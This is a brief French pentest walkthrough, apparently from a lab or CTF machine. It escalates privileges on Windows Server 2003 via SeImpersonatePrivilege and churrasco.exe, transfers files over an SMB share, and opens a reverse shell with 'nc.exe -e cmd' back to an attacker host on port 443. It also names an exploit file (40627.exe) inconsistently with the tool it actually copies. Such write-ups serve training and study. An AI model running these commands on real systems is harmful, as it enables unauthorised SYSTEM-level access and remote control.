Windows Server 2003 (Kernel Exploitation)

À l'aide de la commande systeminfo, nous constatons que l'équipement est très ancien (Windows Server 2003) :

systeminfo

Nous avons également le privilège SeImpersonatePrivilege, ce qui nous permet de tenter une élévation de privilèges.

Pour contourner cette limitation, nous allons utiliser l'outil churrasco.exe.

Transfert de fichier Windows (SMB)

Nous utilisons smbserver.py pour partager un répertoire contenant le fichier exploit 40627.exe Ce fichier est ensuite copié sur la machine cible.

smbserver.py share $(pwd) -smb2support

Depuis la machine cible, nous copions le fichier malveillant à l'aide de la commande SMB :

copy \\10.10.14.30\share\churrasco.exe churrasco.exe

Nous pouvons alors exécuter n'importe quelle commande avec ce binaire, par exemple :

.\churrasco.exe "whoami"

Établir une reverse shell

Pour établir une reverse shell, nous écoutons sur le port 443 :

sudo rlwrap nc -nvlp 443

Nous créons à nouveau un serveur SMB avec nc.exe :

smbserver.py share $(pwd) -smb2support

Enfin, nous exécutons la reverse shell avec la commande suivante :

.\churrasco.exe "\\10.10.14.30\share\nc.exe -e cmd 10.10.14.30 443"

Mis à jour il y a 1 an